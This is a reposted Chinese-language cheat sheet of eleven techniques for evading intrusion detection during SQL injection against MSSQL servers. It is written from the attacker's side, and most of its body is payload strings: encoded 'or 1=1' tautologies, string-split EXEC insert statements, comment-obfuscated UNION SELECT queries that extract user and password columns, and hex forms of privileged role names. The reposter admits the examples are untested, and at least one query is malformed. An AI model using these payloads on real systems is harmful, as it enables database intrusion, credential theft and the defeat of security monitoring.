註:以下文章非本人撰寫為中國大陸網路轉載文章,並經本人整理。
來源:阿D SQL Injection规避入侵检测技术总结
作者:天馬行空技術小組
註:以下語法範例本人並沒驗證其可行性,有興趣的人如有驗證成功也請告知。
##CONTINUE##
當我們對一個運行IDS系統的伺服器進行SQL注入時,我們往往會遇到很大的麻煩,因為我們的注射語句被過濾了,如何規避這種檢測手段就成了一門新的技術,本文就對此規避技術提出十一條思路和方法與大家分享。
一、 運用編碼技術繞過,如URLEncode編碼,ASCII編碼繞過。
如or 1=1即%6f%72%20%31%3d%31
Test即CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)
二、 通過空格繞過,如兩個空格代替一個空格,用Tab代替空格等,或者刪除所有空格,如or’swords’=‘swords’,由於mssql的鬆散性,我們可以把or ‘swords’之間的空格去掉,並不影響運行。
三、 運用字串判斷代替經典的or 1=1判斷繞過,如or ‘swords’=‘swords’
四、 通過類型轉換修飾符N繞過,如or ‘swords’ = N’swords’,大寫的N告訴mssql server 字串作為nvarchar類型,它起到類型轉換的作用,並不影響注射語句本身,但是可以避過基於知識的模式匹配IDS。
五、 通過+號拆解字串繞過,如 or ‘swords’=‘sw’+’ords’
;EXEC(‘IN’+’SERT INTO ‘+’…..’)
六、 通過LIKE繞過,如or ‘swords’ LIKE ‘sw’
七、 通過IN繞過,如or ‘swords’ IN (‘swords’)
八、 通過BETWEEN繞過,如or ‘swords’ BETWEEN ‘rw’ AND ‘tw’
九、 通過>或者<繞過,如
or ‘swords’>‘sw’
or ‘swords’<‘tw’
or 1<3
十、 運用注釋語句繞過:
用/**/代替空格,如:
UNION /**/ Select /**/user,pwd,from tbluser
用/**/分割敏感詞,如:
U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser
十一、 用HEX繞過,一般的IDS都無法檢測出來。
0x730079007300610064006D0069006E00 =hex(sysadmin)
0x640062005F006F0077006E0065007200 =hex(db_owner)
以上的十一條SQL Injection規避入侵偵測技術供您參考。